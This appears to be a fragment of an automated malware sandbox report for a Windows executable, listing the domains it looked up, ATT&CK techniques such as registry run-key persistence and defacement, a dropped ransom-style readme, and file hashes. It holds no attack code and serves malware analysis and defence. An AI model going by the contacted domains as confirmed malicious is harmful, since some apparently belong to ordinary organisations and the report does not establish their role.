8.8.8.8:53

182.220.40.70.in-addr.arpa

dns

72 B
106 B
1
1

DNS Request

182.220.40.70.in-addr.arpa
8.8.8.8:53

31.95.21.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

31.95.21.104.in-addr.arpa
8.8.8.8:53

xtptrack.com

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

58 B
74 B
1
1

DNS Request

xtptrack.com

DNS Response

35.190.31.54
8.8.8.8:53

www.xtptrack.com

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

62 B
78 B
1
1

DNS Request

www.xtptrack.com

DNS Response

34.120.190.48
8.8.8.8:53

54.31.190.35.in-addr.arpa

dns

71 B
122 B
1
1

DNS Request

54.31.190.35.in-addr.arpa
8.8.8.8:53

gemeentehetkompas.nl

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

66 B
137 B
1
1

DNS Request

gemeentehetkompas.nl
8.8.8.8:53

alsace-first.com

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

124 B
156 B
2
2

DNS Request

alsace-first.com

DNS Request

alsace-first.com

DNS Response

213.186.33.4

DNS Response

213.186.33.4
8.8.8.8:53

48.190.120.34.in-addr.arpa

dns

72 B
124 B
1
1

DNS Request

48.190.120.34.in-addr.arpa
8.8.8.8:53

4.33.186.213.in-addr.arpa

dns

71 B
103 B
1
1

DNS Request

4.33.186.213.in-addr.arpa
8.8.8.8:53

woodleyacademy.org

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

64 B
80 B
1
1

DNS Request

woodleyacademy.org

DNS Response

208.95.242.12
8.8.8.8:53

12.242.95.208.in-addr.arpa

dns

144 B
100 B
2
1

DNS Request

12.242.95.208.in-addr.arpa

DNS Request

12.242.95.208.in-addr.arpa
8.8.8.8:53

sportsmassoren.com

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

64 B
80 B
1
1

DNS Request

sportsmassoren.com

DNS Response

94.231.106.24
8.8.8.8:53

olejuulsmuskelterapi.dk

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

138 B
170 B
2
2

DNS Request

olejuulsmuskelterapi.dk

DNS Request

olejuulsmuskelterapi.dk

DNS Response

185.21.41.131

DNS Response

185.21.41.131
8.8.8.8:53

24.106.231.94.in-addr.arpa

dns

144 B
210 B
2
2

DNS Request

24.106.231.94.in-addr.arpa

DNS Request

24.106.231.94.in-addr.arpa
8.8.8.8:53

131.41.21.185.in-addr.arpa

dns

144 B
208 B
2
2

DNS Request

131.41.21.185.in-addr.arpa

DNS Request

131.41.21.185.in-addr.arpa
8.8.8.8:53

vyhino-zhulebino-24.ru

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

68 B
129 B
1
1

DNS Request

vyhino-zhulebino-24.ru
8.8.8.8:53

torgbodenbollnas.se

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

130 B
162 B
2
2

DNS Request

torgbodenbollnas.se

DNS Request

torgbodenbollnas.se

DNS Response

46.30.211.38

DNS Response

46.30.211.38
8.8.8.8:53

ora-it.de

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

55 B
71 B
1
1

DNS Request

ora-it.de

DNS Response

176.28.10.103
8.8.8.8:53

www.ora-it.de

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

118 B
178 B
2
2

DNS Request

www.ora-it.de

DNS Request

www.ora-it.de

DNS Response

176.28.10.103

DNS Response

176.28.10.103
8.8.8.8:53

38.211.30.46.in-addr.arpa

dns

71 B
107 B
1
1

DNS Request

38.211.30.46.in-addr.arpa
8.8.8.8:53

103.10.28.176.in-addr.arpa

dns

144 B
208 B
2
2

DNS Request

103.10.28.176.in-addr.arpa

DNS Request

103.10.28.176.in-addr.arpa
8.8.8.8:53

digi-talents.com

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

124 B
156 B
2
2

DNS Request

digi-talents.com

DNS Request

digi-talents.com

DNS Response

46.226.40.217

DNS Response

46.226.40.217
8.8.8.8:53

chandlerpd.com

dns

42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

120 B
152 B
2
2

DNS Request

chandlerpd.com

DNS Request

chandlerpd.com

DNS Response

216.40.34.41

DNS Response

216.40.34.41
8.8.8.8:53

217.40.226.46.in-addr.arpa

dns

144 B
260 B
2
2

DNS Request

217.40.226.46.in-addr.arpa

DNS Request

217.40.226.46.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Recovery\wpq2m-readme.txt

Filesize
6KB

MD5
b65f51bad8626853934a0518c548a43f

SHA1
ddcc3441140e30c9d8441993450205f6db92a537

SHA256
8f5e216586c699436f0a0f8c09a57745a0345bc942129db3edfc618f32c0e80f

SHA512
b0b613d964cf9ce1d4148247920e7ecedf5f6c65c8c6fe3066146d9dfb2c7083411a7b9287f2190c8e7bf39daac02f2355c47ff5975f40ead1dca521429ea7e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ftzc4am2.qz5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/4824-0-0x000002A9E66E0000-0x000002A9E6702000-memory.dmp

Filesize
136KB

Download
memory/4824-10-0x00007FFFB7AB0000-0x00007FFFB8571000-memory.dmp

Filesize
10.8MB

Download
memory/4824-11-0x000002A9FEB10000-0x000002A9FEB20000-memory.dmp

Filesize
64KB

Download
memory/4824-14-0x00007FFFB7AB0000-0x00007FFFB8571000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request